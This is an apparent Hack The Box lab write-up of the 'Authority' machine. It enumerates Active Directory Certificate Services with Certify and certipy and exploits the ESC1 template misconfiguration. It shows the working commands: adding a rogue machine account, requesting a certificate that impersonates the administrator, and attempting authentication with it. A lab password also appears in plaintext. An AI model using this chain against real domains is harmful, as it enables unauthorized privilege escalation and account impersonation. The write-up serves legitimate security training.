ADCS
Active Directory Certificate Services (AD CS) is a Windows Server role for issuing and managing public key infrastructure (PKI) certificates used in secure communication and authentication protocols.
ad cs provides the following important features:
- certification authorities: Root and subordinate Certificate Authorities (CAs) are used to issue certificates to users, computers, and services, and to manage certificate validity.
- web enrollment: Web enrollment allows users to connect to a CA with a Web browser in order to request certificates and retrieve certificate revocation lists (CRLs).
- online responder: The Online Responder service decodes revocation status requests for specific certificates, evaluates the status of these certificates, and sends back a signed response containing the requested certificate status information.
- network device enrollment service: The Network Device Enrollment Service allows routers and other network devices that don’t have domain accounts to obtain certificates.
- tpm key attestation: Lets the certification authority verify the private key is protected by a hardware-based TPM and that the TPM is one that the CA trusts. TPM key attestation prevents the certificate from being exported to an unauthorized device and can bind the user identity to the device.
- certificate enrollment policy web service: The Certificate Enrollment Policy Web Service enables users and computers to obtain certificate enrollment policy information.
- certificate enrollment web service: Certificate Enrollment Web Service enables users and computers to perform certificate enrollment through a web service. Together with the Certificate Enrollment Policy Web Service, this enables policy-based certificate enrollment when the client computer isn’t a member of a domain or when a domain member isn’t connected to the domain.
The initial suspicion was made due to the presence of the Ansible playbook dedicated to the ADCS in the SMB share; Development
later stage, i saw the certsrv process, which is mostly associated with the certificate services web enrollment role service, which is part of Active Directory Certificate Services (ADCS)
*evil-winrm* ps c:\Users\svc_ldap\Documents> Get-Service -Name "CertSvc"
Status Name DisplayName
------ ---- -----------
Running CertSvc Active Directory Certificate ServicesADCS instead runs on service CertSvc is the service directly responsible for ADCS, running in the background
While there are many ways to enumerate the ADCS to look for vulnerability, the following 2 tools dominates;
- Certify.exe: A C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).
- certipy: A Python implementation of Certify.exe with support to a custom BloodHound
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> ./Certify.exe find /vulnerable /quiet
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'
[*] Listing info about the Enterprise CA 'AUTHORITY-CA'
Enterprise CA Name : AUTHORITY-CA
DNS Hostname : authority.authority.htb
FullName : authority.authority.htb\AUTHORITY-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=AUTHORITY-CA, DC=authority, DC=htb
Cert Thumbprint : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
Cert Serial : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Cert Start Date : 4/23/2023 9:46:26 PM
Cert End Date : 4/23/2123 9:56:25 PM
Cert Chain : CN=AUTHORITY-CA,DC=authority,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
Allow ManageCA, ManageCertificates HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : authority.authority.htb\AUTHORITY-CA
Template Name : CorpVPN
Schema Version : 2
Validity Period : 20 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
mspki-certificate-application-policy : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Domain Computers S-1-5-21-622327497-3269355298-2248959698-515
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Object Control Permissions
Owner : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
WriteOwner Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteDacl Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteProperty Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519Certify.exe found a vulnerable template CorpVPN by the authority.authority.htb\AUTHORITY-CA CA
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy find -vulnerable -u svc_ldap@authority.htb -p lDaP_1n_th3_cle4r! -dc-ip $IP -stdout
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationcertipy also flagged CorpVPN as a vulnerable template for the very same reason
It also specified the type of vulnerability; ESC1
The vulnerability is present due to
- The
Enrollment Rightsattribute with one of its values beingAUTHORITY.HTB\Domain Computers- By default, any domain users are able to add up to 10 machine account. This was confirmed earlier
- The
msPKI-Certificate-Name-Flagattribute set toENROLLEE_SUPPLIES_SUBJECT- Meaning that the enrollee (the computer account in this case) is able to set who to assign this certificate to
- The
pkiextendedkeyusageattribute hasClient Authenticationset- It indicates that the certificate that will be generated based on this vulnerable certificate template can be used to authenticate to computers in Active Directory.
Adding a Computer Account
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ KRB5CCNAME=../svc_ldap.ccache impacket-addcomputer authority.htb/ -k -no-pass -computer-name esc1 -computer-pass 'qwe123' -dc-host authority.authority.htb -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Successfully added machine account esc1$ with password qwe123.using the pass the ticket technique with tgt of the svc_ldap user, i am able to add a computer account (esc1:qwe123) to the target domain via impacket-addcomputer
*evil-winrm* ps c:\Users\svc_ldap\Documents> Get-ADComputer -filter *
distinguishedname : CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
dnshostname : authority.authority.htb
enabled : True
name : AUTHORITY
objectclass : computer
objectguid : 23c88ddb-c76e-41bd-8b75-dd04e08431cc
samaccountname : AUTHORITY$
sid : S-1-5-21-622327497-3269355298-2248959698-1000
userprincipalname :
distinguishedname : CN=esc1,CN=Computers,DC=authority,DC=htb
dnshostname :
enabled : True
name : esc1
objectclass : computer
objectguid : ebbd3672-dfdc-4ecc-90dd-4382f1f50a18
samaccountname : esc1$
sid : S-1-5-21-622327497-3269355298-2248959698-11604
userprincipalname :I can confirm that from the existing WinRM session with the Get-ADComputer PowerShell cmdlet
Requesting Certificate with Impersonation
Now that I have created a valid AD computer object, I should be able to authenticate as the computer account and request for a certificate Since Certify.exe does not support requesting a certificate as someone else natively, I would need to use certipy
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy req -u 'esc1$@authority.htb' -p qwe123 -target authority.authority.htb -ca AUTHORITY-CA -template 'CorpVPN' -upn administrator@authority.htb
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 9
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'I can request for a certificate as the newly created computer account (esc1$), setting the UPN to impersonate the administrator user
or with -subject CN=Administrator,CN=Users,DC=AUTHORITY,DC=HTB
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy auth -pfx administrator.pfx -username administrator -domain authority.htb -dc-ip $IP
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)Attempting to authenticate using the retrieved certificate file (administrator.pfx) fails
This usually works but it didn’t because the target KDC has this particular feature disabled More details about this error can be checked here
There is a solution to this since PFX files are used for storing the server certificate, intermediate certificates, and the private key.
Bloodhound with certipy
certipy also supports outputting a result as bloundhound data for GUI review however, it requires a custom fork of bloodhound
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy find -vulnerable -u svc_ldap@authority.htb -p lDaP_1n_th3_cle4r! -dc-ip $IP -bloodhound
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] got error while trying to get ca configuration for 'authority-ca' via csra: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230718000444_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
Since this is a Custom BloodHound designed to work with PKI nodes, there is a dedicated section in the Analysis tab
